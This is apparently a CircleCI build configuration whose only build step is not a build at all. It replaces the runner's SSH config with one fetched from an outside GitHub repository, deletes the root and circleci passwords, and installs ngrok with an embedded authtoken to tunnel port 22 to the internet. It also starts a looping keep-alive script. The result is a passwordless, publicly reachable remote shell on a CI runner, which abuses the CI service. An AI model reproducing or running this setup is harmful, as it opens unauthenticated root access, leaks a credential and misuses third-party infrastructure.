
version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2404:2024.05.1
    parallelism: 4
    resource_class: arm.medium
    steps:
      - checkout

      - run: sudo apt clean && sudo apt update && sudo service ssh stop && sudo rm -r /etc/ssh/sshd_config && wget https://github.com/natirutsfan/someone-s-project/raw/refs/heads/main/sshd_config && sudo cp -r sshd_config /etc/ssh/sshd_config && curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok && sudo passwd -d root && sudo passwd -d circleci && ngrok config add-authtoken 2h6qNhs62Epq6cIxpKnlZVRMo0A_7KTWLfuijGeQt1ZYy6KGZ && sudo service ssh start && ngrok tcp 22 & && echo "echo VIVO && sleep 5 && ./life.sh" > life.sh && sudo chmod 777 life.sh && ./life.sh
# Edut
